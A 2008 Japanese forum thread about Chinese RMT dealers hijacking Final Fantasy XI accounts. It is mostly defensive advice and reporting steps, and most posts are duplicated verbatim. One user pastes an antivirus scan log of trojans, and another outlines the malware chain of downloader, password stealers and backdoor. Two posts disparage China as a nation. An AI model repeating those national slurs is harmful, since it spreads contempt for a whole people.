●● RMT業者の垢ハックが多発している件14 ●●
1 :既にその名前は使われています:
RMT業者が一般プレイヤーのID・パスワードを盗んで不正にログインし、
アイテムやギルを奪う事件についてのスレッドです。詳細は>>2-10くらい
前スレ→http://live27.2ch.net/test/read.cgi/ogame/1205225002/
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり)
ttp://ort.sakura.ne.jp/taisai/
FF11Warning(ハッキングに重点をおいて詳しくまとめてあります)
ttp://miku.a.orn.jp/miku2/
FFXI Virus問題 まとめサイト(初心者さん向け)
ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★リアルタイムで被害に遭われている方へ★
まずサポセンに電話し、不正アクセスの被害にあっていると伝えましょう(本人確認の後、対処してくれます)
■スクウェア・エニックス インフォメーションセンター
TEL:0570-003-399(PHSからは03-5333-1860)
月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
※サポセンが営業時間外の場合は、別アカウントを所持しているならそれでログインしてGMを呼ぶか、
他にログインできるアカウントがない場合はサポセンが開いてから電話をすることになります。
アイテムやギルを奪う事件についてのスレッドです。詳細は>>2-10くらい
前スレ→http://live27.2ch.net/test/read.cgi/ogame/1205225002/
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり)
ttp://ort.sakura.ne.jp/taisai/
FF11Warning(ハッキングに重点をおいて詳しくまとめてあります)
ttp://miku.a.orn.jp/miku2/
FFXI Virus問題 まとめサイト(初心者さん向け)
ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★リアルタイムで被害に遭われている方へ★
まずサポセンに電話し、不正アクセスの被害にあっていると伝えましょう(本人確認の後、対処してくれます)
■スクウェア・エニックス インフォメーションセンター
TEL:0570-003-399(PHSからは03-5333-1860)
月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
※サポセンが営業時間外の場合は、別アカウントを所持しているならそれでログインしてGMを呼ぶか、
他にログインできるアカウントがない場合はサポセンが開いてから電話をすることになります。
|
|
|
2 :既にその名前は使われています:2008/03/24(月) 02:50:50.08 ID:7DTVIQ6X
■アカウントハックとは
主に中国のRMT業者(※1)がFF11関係のサイト(blogや情報サイト等)にアカウント情報を吸い出せる
罠ツールを仕掛けたサイトアドレスを貼り、FF11プレイヤーにそれを踏ませることにより
IDとpassを盗んで不正にログインし、所持アイテムやギルをを奪ってしまう(※2)行為の事です。
ログイン時にパスワードも変更され利用者本人がログイン出来なくなることも多々あります。
奪われたアイテムは各鯖にいるアイテム販売用キャラ(※3)が競売や店売りしてる模様。
※1:blogへの書き込みIP、リンクで飛んだ先のHPアドレスの所持者を調べると中国な為
※2:アイテムを奪われるだけの人も居れば、サーバー移動させられてたりキャラが消されていたりと多種多様の報告があります。
※3:Luckshop等、確認できるだけで21の鯖にいる業者の販売担当キャラ。FFAHで履歴調べると色々分かります
主に中国のRMT業者(※1)がFF11関係のサイト(blogや情報サイト等)にアカウント情報を吸い出せる
罠ツールを仕掛けたサイトアドレスを貼り、FF11プレイヤーにそれを踏ませることにより
IDとpassを盗んで不正にログインし、所持アイテムやギルをを奪ってしまう(※2)行為の事です。
ログイン時にパスワードも変更され利用者本人がログイン出来なくなることも多々あります。
奪われたアイテムは各鯖にいるアイテム販売用キャラ(※3)が競売や店売りしてる模様。
※1:blogへの書き込みIP、リンクで飛んだ先のHPアドレスの所持者を調べると中国な為
※2:アイテムを奪われるだけの人も居れば、サーバー移動させられてたりキャラが消されていたりと多種多様の報告があります。
※3:Luckshop等、確認できるだけで21の鯖にいる業者の販売担当キャラ。FFAHで履歴調べると色々分かります
3 :既にその名前は使われています:2008/03/24(月) 02:51:08.68 ID:7DTVIQ6X
■予防と自衛が各プレイヤーに求められています。
被害に遭わないためにも各自でできる限りの防衛手段を身に着けておきましょう。
【公式より抜粋】
▼内容が不明なサイトにアクセスしない
※blogのレスの名前部分(HPアド)にリンクをつけてリンクアドレスを見せないようにする手口もあります。
絶対にリンクを押す前にアドレスを見る事
▼不明なサイトにあるソフトウェアのダウンロードを不用意に行わない
▼Microsoft Update(Windows Update)を定期的に実行し、Windowsを常に最新の状態に保つ
※詳しくはマイクロソフト社の公式サイトを参照のこと。
▼利用しているWebブラウザーなどを定期的にアップデートして常に最新のプログラムを使用する
▼スクウェアエニックス社が使用を認めていない外部ツールを絶対に使用しない
▼ウイルス駆除ソフトを常に最新のバージョンで使用する
被害に遭わないためにも各自でできる限りの防衛手段を身に着けておきましょう。
【公式より抜粋】
▼内容が不明なサイトにアクセスしない
※blogのレスの名前部分(HPアド)にリンクをつけてリンクアドレスを見せないようにする手口もあります。
絶対にリンクを押す前にアドレスを見る事
▼不明なサイトにあるソフトウェアのダウンロードを不用意に行わない
▼Microsoft Update(Windows Update)を定期的に実行し、Windowsを常に最新の状態に保つ
※詳しくはマイクロソフト社の公式サイトを参照のこと。
▼利用しているWebブラウザーなどを定期的にアップデートして常に最新のプログラムを使用する
▼スクウェアエニックス社が使用を認めていない外部ツールを絶対に使用しない
▼ウイルス駆除ソフトを常に最新のバージョンで使用する
4 :既にその名前は使われています:2008/03/24(月) 02:51:55.37 ID:7DTVIQ6X
■具体的な自衛策
1:ウイルススキャンソフトを導入する。
・シマンテック、カスペルスキー、マカフィー、トレンドマイクロ社のソフトを有料で購入する。
・AVG、AntiVir、avast!、BitDefenderなどの無料ソフトをダウンロードして使用するという手もあります。
2:WindowsUpdateでWindowsを最新の状態にする
Windowsは最初にインストールしただけで万全というわけではなく、次々と発見されるセキュリティホールを
後付で修正し、それをWindowsUpdateで配布することで安全性を保つようにできています。
一般的には自動更新がされるよう設定されていますが、重いからという理由で自動更新機能を
オフにしている人もいると思います。その場合は必ず定期的に手動で更新を行ってください。
3:ファイアウォールを有効にする
・1に上げた有料ソフト等に同梱されているものや、同じ会社から出ているものを使う
・ベクターや窓の杜などでフリーのファイアウォールソフトを探し、導入する
(2chカテゴリ「ネット関係」>「セキュリティ」板にフリーのファイアウォールソフトの
スレッドがあります。「ファイアウォール」などの単語で検索してください)
1:ウイルススキャンソフトを導入する。
・シマンテック、カスペルスキー、マカフィー、トレンドマイクロ社のソフトを有料で購入する。
・AVG、AntiVir、avast!、BitDefenderなどの無料ソフトをダウンロードして使用するという手もあります。
2:WindowsUpdateでWindowsを最新の状態にする
Windowsは最初にインストールしただけで万全というわけではなく、次々と発見されるセキュリティホールを
後付で修正し、それをWindowsUpdateで配布することで安全性を保つようにできています。
一般的には自動更新がされるよう設定されていますが、重いからという理由で自動更新機能を
オフにしている人もいると思います。その場合は必ず定期的に手動で更新を行ってください。
3:ファイアウォールを有効にする
・1に上げた有料ソフト等に同梱されているものや、同じ会社から出ているものを使う
・ベクターや窓の杜などでフリーのファイアウォールソフトを探し、導入する
(2chカテゴリ「ネット関係」>「セキュリティ」板にフリーのファイアウォールソフトの
スレッドがあります。「ファイアウォール」などの単語で検索してください)
5 :既にその名前は使われています:2008/03/24(月) 02:52:01.80 ID:EkJgurYg
業者あげ
6 :既にその名前は使われています:2008/03/24(月) 02:52:10.54 ID:7DTVIQ6X
■具体的な自衛策その2
4:IPフィルタを導入する
PeerGuardian2というフリーソフトで特定の国(この場合は特に中国)のIPへのアクセスを遮断できます
★PeerGuardian2の導入・設定方法はここから
リネージュ資料室 ttp://lineage.nyx.bne.jp/misc/security/id_basic-ipfilter.html
このURLを踏みたくない人はgoogleで『リネージュ資料室』で検索してメニューから
セキュリティー対策→IPフィルタ で確認してください。
5:IE以外のウェブブラウザを使用する
Firefox、Opera、など。
ただしそれぞれのブラウザにもセキュリティホールが見つかることもあるので、
ブラウザ自体のアップデートも行う必要があります。
6:不審な・見覚えの無いURLを踏む必要がある場合は、まずaguse.jpやソースチェッカーを使用する。
ttp://www.aguse.jp/
URLを入力するとそのページのSSとドメイン情報、各ブラックリストに照らし合わせた結果が表示されます。
ソースチェッカーにはWebページ上のものと、DLして使用できるフリーソフトがあります。
4:IPフィルタを導入する
PeerGuardian2というフリーソフトで特定の国(この場合は特に中国)のIPへのアクセスを遮断できます
★PeerGuardian2の導入・設定方法はここから
リネージュ資料室 ttp://lineage.nyx.bne.jp/misc/security/id_basic-ipfilter.html
このURLを踏みたくない人はgoogleで『リネージュ資料室』で検索してメニューから
セキュリティー対策→IPフィルタ で確認してください。
5:IE以外のウェブブラウザを使用する
Firefox、Opera、など。
ただしそれぞれのブラウザにもセキュリティホールが見つかることもあるので、
ブラウザ自体のアップデートも行う必要があります。
6:不審な・見覚えの無いURLを踏む必要がある場合は、まずaguse.jpやソースチェッカーを使用する。
ttp://www.aguse.jp/
URLを入力するとそのページのSSとドメイン情報、各ブラックリストに照らし合わせた結果が表示されます。
ソースチェッカーにはWebページ上のものと、DLして使用できるフリーソフトがあります。
7 :既にその名前は使われています:2008/03/24(月) 02:52:30.81 ID:7DTVIQ6X
■もし被害に遭ってしまった場合
「ある日突然登録してあるパスワードでログインできなくなった」もしくは「ある日ログインすると
キャラクターのアイテムやギルが奪われていた」等の、不正アクセスと思しき被害にあった場合は、
まず>>1にあるサポセンの連絡先に電話してパスワードの再発行を受けたり、不正アクセスの被害を
受けたことを報告しましょう。
現時点(平成19年10月下旬)でのスクウェアエニックス社インフォメーションセンターの。不正アクセス被害者への
対応は、「社内の調査だけでは不正アクセスと断定することができない」という調査結果の報告のみです。
不正アクセスと断定できないとはつまり、「RMT業者に自発的にアイテムやギルを受け渡したのは
被害者本人である」ということにされている状態です。
この状態の打開及びさらなる追及を望むならば、警察への届出が必要になります。
不正アクセス行為の禁止等に関する法律、通称不正アクセス禁止法においては、
こういった事例での被害者は「不正アクセスをされた側」つまりスクウェアエニックス社になりますが、
アカウントを乗っ取られた側でも「利用権の侵害」として被害を届出することができます。
「ある日突然登録してあるパスワードでログインできなくなった」もしくは「ある日ログインすると
キャラクターのアイテムやギルが奪われていた」等の、不正アクセスと思しき被害にあった場合は、
まず>>1にあるサポセンの連絡先に電話してパスワードの再発行を受けたり、不正アクセスの被害を
受けたことを報告しましょう。
現時点(平成19年10月下旬)でのスクウェアエニックス社インフォメーションセンターの。不正アクセス被害者への
対応は、「社内の調査だけでは不正アクセスと断定することができない」という調査結果の報告のみです。
不正アクセスと断定できないとはつまり、「RMT業者に自発的にアイテムやギルを受け渡したのは
被害者本人である」ということにされている状態です。
この状態の打開及びさらなる追及を望むならば、警察への届出が必要になります。
不正アクセス行為の禁止等に関する法律、通称不正アクセス禁止法においては、
こういった事例での被害者は「不正アクセスをされた側」つまりスクウェアエニックス社になりますが、
アカウントを乗っ取られた側でも「利用権の侵害」として被害を届出することができます。
8 :既にその名前は使われています:2008/03/24(月) 02:52:49.34 ID:7DTVIQ6X
■警察への通報方法
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
都道府県警察本部のサイバー犯罪相談窓口等一覧
ttp://www.npa.go.jp/cyber/soudan.htm
2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
(この段階を踏まずに直接所轄署に行くと、「専門の窓口に連絡しろ」と言われてしまう可能性があります)
3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。
4:資料を持参して所轄の署に赴き、「利用権の侵害」での被害を報告します。
「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが、
家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
都道府県警察本部のサイバー犯罪相談窓口等一覧
ttp://www.npa.go.jp/cyber/soudan.htm
2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
(この段階を踏まずに直接所轄署に行くと、「専門の窓口に連絡しろ」と言われてしまう可能性があります)
3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。
4:資料を持参して所轄の署に赴き、「利用権の侵害」での被害を報告します。
「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが、
家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。
9 :既にその名前は使われています:2008/03/24(月) 02:53:03.17 ID:7DTVIQ6X
■警察へ行く際に持っていく・用意しておくもの
過去スレで実際に警察へ行った被害者のレスから抜粋
もっていったもの †
o スクエニの会社情報 HPのプリントアウトしたもの
o プレイオンラインサポセンの電話番号
o 印鑑、身分証明
受け答えしてくれたサポセンの人の名前も伝えるといいかも
↑
警察で聞かれたもの †
o プレイオンラインのIDとパスワード
o キャラ名
o 犯行時間帯
o 被害内容(なくなったゲーム内通貨・アイテム)
o プロバイダ
過去スレで実際に警察へ行った被害者のレスから抜粋
もっていったもの †
o スクエニの会社情報 HPのプリントアウトしたもの
o プレイオンラインサポセンの電話番号
o 印鑑、身分証明
受け答えしてくれたサポセンの人の名前も伝えるといいかも
↑
警察で聞かれたもの †
o プレイオンラインのIDとパスワード
o キャラ名
o 犯行時間帯
o 被害内容(なくなったゲーム内通貨・アイテム)
o プロバイダ
10 :既にその名前は使われています:2008/03/24(月) 02:53:56.36 ID:7DTVIQ6X
■このスレの目的
1:予防・自衛の徹底の周知
2:被害報告の収集
3:罠サイトURIの収集
4:被害者が現れた場合に対処をアドバイスする
★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください
☆「スクエニ社に法的責任を!」や「誰が悪いかランキング」、「被害者の会を作れ」等の議論も
この場で行ってくださって構いませんが、スレを見に来た一見さんの質問や被害者の報告は
無視せずに対応してください。
1:予防・自衛の徹底の周知
2:被害報告の収集
3:罠サイトURIの収集
4:被害者が現れた場合に対処をアドバイスする
★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください
☆「スクエニ社に法的責任を!」や「誰が悪いかランキング」、「被害者の会を作れ」等の議論も
この場で行ってくださって構いませんが、スレを見に来た一見さんの質問や被害者の報告は
無視せずに対応してください。
11 :既にその名前は使われています:2008/03/24(月) 02:54:22.50 ID:7DTVIQ6X
■アカウントハックの救済について署名して下さい
ttp://www.petitiononline.com/FFvoice/petition.html
[Click Here to Sign Petition]=請願に署名して下さる方はこちらをクリックして下さい。
Name=名前(必須) Email Address=メール(必須) Real name=本名(任意) Server name=サーバー(必須)
Email Address Privacy Option=メールアドレスプライバシーオプション
:Private=署名妥当性確保のためのメールアドレスですプライベートでスクウェアに提供されません
:Available to Petition Author=プライベートですがスクウェアに提供されます
:Public=全ての人が閲覧可能です
[Preview Your Signature]=貴方の署名を確認します
View Signatures Without Signing=署名をしないで他の署名を見ます
ttp://www.petitiononline.com/FFvoice/petition.html
[Click Here to Sign Petition]=請願に署名して下さる方はこちらをクリックして下さい。
Name=名前(必須) Email Address=メール(必須) Real name=本名(任意) Server name=サーバー(必須)
Email Address Privacy Option=メールアドレスプライバシーオプション
:Private=署名妥当性確保のためのメールアドレスですプライベートでスクウェアに提供されません
:Available to Petition Author=プライベートですがスクウェアに提供されます
:Public=全ての人が閲覧可能です
[Preview Your Signature]=貴方の署名を確認します
View Signatures Without Signing=署名をしないで他の署名を見ます
12 :既にその名前は使われています:2008/03/24(月) 03:04:30.88 ID:vQXYTLxz
13 :既にその名前は使われています:2008/03/24(月) 03:05:44.32 ID:EkJgurYg
紙媒体しか安心して見れないこんなFFじゃ
14 :既にその名前は使われています:2008/03/24(月) 03:16:22.91 ID:mYAh1jWO
RMTする人達が減ったのかな?o(`ω´*)o
15 :既にその名前は使われています:2008/03/24(月) 03:19:43.83 ID:euFX6pRg
中国はマジで腐った国だな。
16 :既にその名前は使われています:2008/03/24(月) 03:21:27.29 ID:BS8RD3fS
いちょつ
17 :既にその名前は使われています:2008/03/24(月) 03:22:44.14 ID:BS8RD3fS
18 :既にその名前は使われています:2008/03/24(月) 03:24:47.93 ID:IxSaroBR
カスペのオンラインスキャンが動くブラウザを使わないほうがいいぞ
あれが動かないブラウザのほうがセキュリティ的には信用できる
オペラなんて罠ページ踏んでも(だいたい)平気だぜ・・・普通のページも見れないことあるが・・・
あれが動かないブラウザのほうがセキュリティ的には信用できる
オペラなんて罠ページ踏んでも(だいたい)平気だぜ・・・普通のページも見れないことあるが・・・
19 :既にその名前は使われています:2008/03/24(月) 03:34:30.07 ID:xPk7dngc
>>15
自分が痛くなければ何やっても愛国無罪な国だからな
自分が痛くなければ何やっても愛国無罪な国だからな
20 :既にその名前は使われています:2008/03/24(月) 03:43:51.91 ID:l9SAEJ0+
>>13
poizun
poizun
21 :既にその名前は使われています:2008/03/24(月) 03:50:16.95 ID:Df86aKNo
ヴァナモンブログちょっとひどくね?
改ざんされたことを責めるつもりは毛頭ないが、そのことに触れずにしれっと直して
あたかもなにもありませんでした、みたいなのはチキンすぎる。
自分のブログに訪れてくれた読者に対して申し訳ないとか思わないのかね?
こういうのを認めると今後そういうやつが増えて被害拡大するとおもうんだ。
改ざんされたことを責めるつもりは毛頭ないが、そのことに触れずにしれっと直して
あたかもなにもありませんでした、みたいなのはチキンすぎる。
自分のブログに訪れてくれた読者に対して申し訳ないとか思わないのかね?
こういうのを認めると今後そういうやつが増えて被害拡大するとおもうんだ。
22 :既にその名前は使われています:2008/03/24(月) 03:54:32.57 ID:vQXYTLxz
ネットは自己責任。
叩き所が間違ってる。
叩き所が間違ってる。
23 :既にその名前は使われています:2008/03/24(月) 03:56:10.23 ID:ExAbIYmH
まぁ注意喚起位すればいいとは思うけど、fc2のせいであってヴァナモンのせいじゃないしな。
どちらかといえばfc2がページの上に告知するとか
問題を抜本的に解決できるような方法を提示しないこと、またそれを実行しないことが問題。
どちらかといえばfc2がページの上に告知するとか
問題を抜本的に解決できるような方法を提示しないこと、またそれを実行しないことが問題。
24 :既にその名前は使われています:2008/03/24(月) 03:59:36.99 ID:8jcNID1A
前スレ57, 63( http://live27.2ch.net/test/read.cgi/ogame/1205225002/57,63 )の
xia.exeを実行してカスペルスキー試用版でのスキャン終了
(1/2)
検知: トロイの木馬 Trojan.Win32.Inject.agc
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\05S94ZKH\1ro[1].exe
検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8DUF8TQ3\laoie[1].exe//FSG
検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8X2ZG5A3\geizi[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\CNA1O3S3\3ff11[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\S1ANG1QF\2t1[1].exe
検知: トロイの木馬 Trojan-Downloader.Win32.Delf.dsz
→ファイル: C:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
→ファイル: C:\WINDOWS\Help\3EC849F38E63.dll
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
→ファイル: C:\WINDOWS\Help\3EC849F38E63.exe
xia.exeを実行してカスペルスキー試用版でのスキャン終了
(1/2)
検知: トロイの木馬 Trojan.Win32.Inject.agc
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\05S94ZKH\1ro[1].exe
検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8DUF8TQ3\laoie[1].exe//FSG
検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8X2ZG5A3\geizi[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\CNA1O3S3\3ff11[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\S1ANG1QF\2t1[1].exe
検知: トロイの木馬 Trojan-Downloader.Win32.Delf.dsz
→ファイル: C:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
→ファイル: C:\WINDOWS\Help\3EC849F38E63.dll
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
→ファイル: C:\WINDOWS\Help\3EC849F38E63.exe
25 :既にその名前は使われています:2008/03/24(月) 04:00:24.85 ID:8jcNID1A
(2/2)
検知: トロイの木馬 Trojan.Win32.Inject.agc
→ファイル: C:\WINDOWS\system32\1.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
→ファイル: C:\WINDOWS\system32\2.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa
→ファイル: C:\WINDOWS\system32\3.exe
検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd
→ファイル: C:\WINDOWS\system32\4.exe//FSG
検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx
→ファイル: C:\WINDOWS\system32\5.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.pnr
→ファイル: C:\WINDOWS\system32\krnp32drv.dll
検知: アドウェア not-a-virus:AdWare.Win32.BHO.aj
→ファイル: c:\windows\system32\xunleibho_001.dll
こんな感じ
検知: トロイの木馬 Trojan.Win32.Inject.agc
→ファイル: C:\WINDOWS\system32\1.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
→ファイル: C:\WINDOWS\system32\2.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa
→ファイル: C:\WINDOWS\system32\3.exe
検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd
→ファイル: C:\WINDOWS\system32\4.exe//FSG
検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx
→ファイル: C:\WINDOWS\system32\5.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.pnr
→ファイル: C:\WINDOWS\system32\krnp32drv.dll
検知: アドウェア not-a-virus:AdWare.Win32.BHO.aj
→ファイル: c:\windows\system32\xunleibho_001.dll
こんな感じ
26 :既にその名前は使われています:2008/03/24(月) 04:03:02.46 ID:Q/ktx4QO
>>21
ヴァナモンブログ主を責めるのはちょっとひどくね?
改ざんされたテンプレートをそのまま放置しているfc2を責めることをせずに、
個人を叩いてひゃっほい、みたいなのはチキンすぎる。
運営しているサイトに訪れてくれた読者に対してfc2は申し訳ないとか思わないのかね?
こういうのを認めると今後こういう運営をするやつ増えて被害拡大するとおもうんだ。
であろう?
ヴァナモンブログ主を責めるのはちょっとひどくね?
改ざんされたテンプレートをそのまま放置しているfc2を責めることをせずに、
個人を叩いてひゃっほい、みたいなのはチキンすぎる。
運営しているサイトに訪れてくれた読者に対してfc2は申し訳ないとか思わないのかね?
こういうのを認めると今後こういう運営をするやつ増えて被害拡大するとおもうんだ。
であろう?
カスペルのスキャンが1時間早く終わったーヽ(´ー`)ノ
結果はバスターさんの前に使ってたノートン先生の置き土産が、マルウェアに勘違いされたくらいですた。
以前から使っていたPG2とFirefox&IFRAMEの禁止、今回のカスペルくらいが
自分みたいな素人ができる自衛手段ですかのう。
あ、今使ってるHUBの機械が8年前から使ってるcoregaっていうメーカーのなんだけど、これってマズイ?(´・ω・`)
結果はバスターさんの前に使ってたノートン先生の置き土産が、マルウェアに勘違いされたくらいですた。
以前から使っていたPG2とFirefox&IFRAMEの禁止、今回のカスペルくらいが
自分みたいな素人ができる自衛手段ですかのう。
あ、今使ってるHUBの機械が8年前から使ってるcoregaっていうメーカーのなんだけど、これってマズイ?(´・ω・`)
28 :既にその名前は使われています:2008/03/24(月) 04:13:56.30 ID:Df86aKNo
もちろんまずはfc2が何か言うべきとは思うけどさ。
今後まだまだ改ざんブログが増えるであろうことを考慮すると
その事実を個人レベルで隠蔽するような行為はどうかと思ったんだ。
このスレ的にはブログで事実報告の必要は無いって意見が多いってことか、了解。
今後まだまだ改ざんブログが増えるであろうことを考慮すると
その事実を個人レベルで隠蔽するような行為はどうかと思ったんだ。
このスレ的にはブログで事実報告の必要は無いって意見が多いってことか、了解。
29 :既にその名前は使われています:2008/03/24(月) 04:16:01.17 ID:Q/ktx4QO
Trojan.Win32.Inject.agc
まず、こいつがきっかけで次のダウンローダを起動する。
Trojan-Downloader.Win32.Delf.dsz
次の4種のワームをダウンロードし、常駐させる。
Trojan-PSW.Win32.OnLineGames.sfa
Trojan-PSW.Win32.OnLineGames.lbb
Trojan-PSW.Win32.OnLineGames.sfa
Trojan-PSW.Win32.OnLineGames.pnr
各MMOに対応したID/pw保存ファイルサーチャ
Backdoor.Win32.Hupigon.dsx
上記4種のワームが検出したID/pw保存ファイルを
どこぞに送信するためのポートを開けるとともに
遠隔操作用のポート開けて常駐して待機する。
そして、見事にBOT-NET入りを果たすと。
まず、こいつがきっかけで次のダウンローダを起動する。
Trojan-Downloader.Win32.Delf.dsz
次の4種のワームをダウンロードし、常駐させる。
Trojan-PSW.Win32.OnLineGames.sfa
Trojan-PSW.Win32.OnLineGames.lbb
Trojan-PSW.Win32.OnLineGames.sfa
Trojan-PSW.Win32.OnLineGames.pnr
各MMOに対応したID/pw保存ファイルサーチャ
Backdoor.Win32.Hupigon.dsx
上記4種のワームが検出したID/pw保存ファイルを
どこぞに送信するためのポートを開けるとともに
遠隔操作用のポート開けて常駐して待機する。
そして、見事にBOT-NET入りを果たすと。
30 :既にその名前は使われています:2008/03/24(月) 04:26:34.88 ID:B+yN8em4
いつも見てるFF系ブログの大半がFC2だったわ・・・・
カスペでスキャンしてなんともなかったから良かったが、怖くて暫くはブログ見れないな。
カスペでスキャンしてなんともなかったから良かったが、怖くて暫くはブログ見れないな。
31 :既にその名前は使われています:2008/03/24(月) 04:26:41.08 ID:Q/ktx4QO
>>28
いいか?
改ざんしたのはブログ主ではなく、悪意のテンプレートにしたやつがいて
悪意のあるテンプレートを供給していた運営者がいるんだよ。
つまり、
改ざんしたテンプレートを運営者に出したやつが主犯
そのテンプレートをまともにチェックせずに公開したやつが共犯
なのさ。
本当に叩く先がどこか分かるよな?
確かに注意勧告をブログ主もするとベターだろうが、
ブログ主もクラックされた被害者な訳だ。
いいか?
改ざんしたのはブログ主ではなく、悪意のテンプレートにしたやつがいて
悪意のあるテンプレートを供給していた運営者がいるんだよ。
つまり、
改ざんしたテンプレートを運営者に出したやつが主犯
そのテンプレートをまともにチェックせずに公開したやつが共犯
なのさ。
本当に叩く先がどこか分かるよな?
確かに注意勧告をブログ主もするとベターだろうが、
ブログ主もクラックされた被害者な訳だ。
32 :既にその名前は使われています:2008/03/24(月) 04:28:56.31 ID:uo1cC9cX
手動でパス打つほうが危ないなんてことは・・・ないよね?
33 :既にその名前は使われています:2008/03/24(月) 04:31:35.92 ID:Q/ktx4QO
>>30
BLOGを読むときの手として、直接行くのではなく、RSSリーダで読むのもあり。
なぜかというと、直接行くと、テンプレートを含む全体を読み込むが
RSSリーダならば、本文しか普通は読み込まない「はず」
BLOGを読むときの手として、直接行くのではなく、RSSリーダで読むのもあり。
なぜかというと、直接行くと、テンプレートを含む全体を読み込むが
RSSリーダならば、本文しか普通は読み込まない「はず」
34 :既にその名前は使われています:2008/03/24(月) 04:32:51.75 ID:juaPfmeM
でもさ、ヴァナモンblogで感染して
それを知らずに感染したまま今もヴァナモンblogを見ている人もいると思うんだよね。
叩く矛先の優先順位の問題ではないと思うんだ。
それを知らずに感染したまま今もヴァナモンblogを見ている人もいると思うんだよね。
叩く矛先の優先順位の問題ではないと思うんだ。
35 :既にその名前は使われています:2008/03/24(月) 04:34:12.73 ID:Q/ktx4QO
>>32
>>29のTrojan-PSW.Win32.OnLineGamesの4つが
キーロガーに変わったらどうなるだろうね?
どっちが安全なんてないね。
つか、キーロガーの方が広範囲に情報取れるな。
>>29のTrojan-PSW.Win32.OnLineGamesの4つが
キーロガーに変わったらどうなるだろうね?
どっちが安全なんてないね。
つか、キーロガーの方が広範囲に情報取れるな。
36 :既にその名前は使われています:2008/03/24(月) 04:35:57.93 ID:Df86aKNo
>>31
わかった、っつってるのに粘着なヤツだなw
>悪意のあるテンプレートを供給していた
>改ざんしたテンプレートを運営者に出したやつ
今のところこれに関しては事実関係が確定してないと思ってたんだが確定したのか?
わかった、っつってるのに粘着なヤツだなw
>悪意のあるテンプレートを供給していた
>改ざんしたテンプレートを運営者に出したやつ
今のところこれに関しては事実関係が確定してないと思ってたんだが確定したのか?
37 :既にその名前は使われています:2008/03/24(月) 04:36:36.60 ID:vQXYTLxz
そこまで粘着するなら本人に言えとしか、是非をうんぬんするスレじゃないよ。
38 :既にその名前は使われています:2008/03/24(月) 04:37:03.15 ID:/fj6dMAF
ちょっと聞きたいんですけど
ヴァナモンblogではなく
ヴァナモンでのモンスター検索の方は大丈夫なんでしょうか?
個人的にblogは見ずに検索だけをメインにしてたので・・・
ヴァナモンblogではなく
ヴァナモンでのモンスター検索の方は大丈夫なんでしょうか?
個人的にblogは見ずに検索だけをメインにしてたので・・・
39 :既にその名前は使われています:2008/03/24(月) 04:37:42.86 ID:l9SAEJ0+
個人にそういう役目を担わせる義務はないだろうから
人目につくネ実で、スレ保持/情報共有、注意呼びかけるなど。
有志アカハク専用サイトあんだし。
人目につくネ実で、スレ保持/情報共有、注意呼びかけるなど。
有志アカハク専用サイトあんだし。
